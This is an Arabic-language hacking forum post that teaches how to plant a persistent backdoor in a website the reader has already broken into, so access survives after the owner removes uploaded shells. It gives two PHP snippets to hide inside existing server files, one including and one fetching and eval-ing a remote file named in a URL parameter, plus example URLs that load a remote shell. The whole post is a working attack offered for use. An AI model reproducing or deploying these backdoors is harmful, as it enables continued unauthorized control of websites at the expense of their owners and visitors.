السلام عليكم ورحمه الله وبركاته
اليوم معانا شرح بسيط للتلغيم
لو انت مخترق موقع وناوي ترجع له وتضل ملزق بصاحبه
فامشي معي
انت الان رافع شل
اوك
لو رحنا غيرنا الاندكس
رح يجي صاحب الموقع :grr:
وبعديها يقيم الاندكس :a41:
ويضع اندكس السكربت من جديد والخساره قليله
ويصير موقعه
:00001806[1]:
الحل انلغم ملف من ملفاته
وهو رح يعمل فحص ويمسح شلاتك
ورح يرفع الاندكس الخاص بالسكربت
:21:
فتيجي للتلغيم كيف نعمله
في عنا طريقتي
حسب اصدار البي اتش بي
شوف الاولى
في حال اصدار البي اتش بي 4
كود PHP:
<?php
$Volc4no = $_GET['r57';
include ($Volc4no);
?>
نآخذ الكود ونحطه في اي ملف php موجود على
السيرفر .. وبعدها بيكون الاستغلال كذا
http://www.xxx.com/XX/file.php?r57=http://shell.txt
file.php = الملف الي لغمته بالكود ..
............ هذا للاصدارات php 4.x.x ..
عنا الاصدار خمسه
نفس القصص الطرمه
كود PHP:
<?php
if($_GET[t0v]){
$file=implode("\n",file($_GET[t0v]));
$t0v=str_replace("<?php", "",$file);
$t0v=str_replace("<?", "",$t0v);
$t0v=str_replace("?>", "",$t0v);
eval($t0v);
}
?>
نآخذ الكود ونحطه دآخل اي ملف php موجود عالسيرفر على حسب صلاحياتك في التعديل ..
وبيكون الاستغلال ..
http://www.xxx.com/XX/file.php?t0v=http//shell.txt
موفقين
jgydl lgthj php gqlhk hgv[,u hgn hgsdvtv tdlh fu]